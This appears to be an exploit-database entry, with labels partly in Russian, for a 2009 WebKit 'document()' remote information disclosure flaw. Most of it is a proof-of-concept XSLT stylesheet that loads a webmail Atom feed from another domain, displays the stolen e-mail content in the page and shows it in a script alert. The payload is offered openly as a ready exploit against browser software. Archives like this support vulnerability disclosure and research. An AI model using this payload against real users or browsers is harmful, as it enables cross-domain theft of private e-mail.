Exploit WebKit - 'Document()' Remote Information Disclosure

[Exploiter]

EDB-ID

10086

Проверка EDB

1. Пройдено

Автор

CHRIS EVANS

Тип уязвимости

REMOTE

Платформа

MULTIPLE

CVE

N/A

Дата публикации

2009-11-12

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:str="http://exslt.org/strings" extension-element-prefixes="str">
<xsl:template match="*">
<html>
<body>
Below, you should see e-mail stolen cross-domain!
<p/>
<xsl:value-of select="document('https://mail.example.com/mail/feed/atom')"/>
<script>
alert(document.body.innerHTML)
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>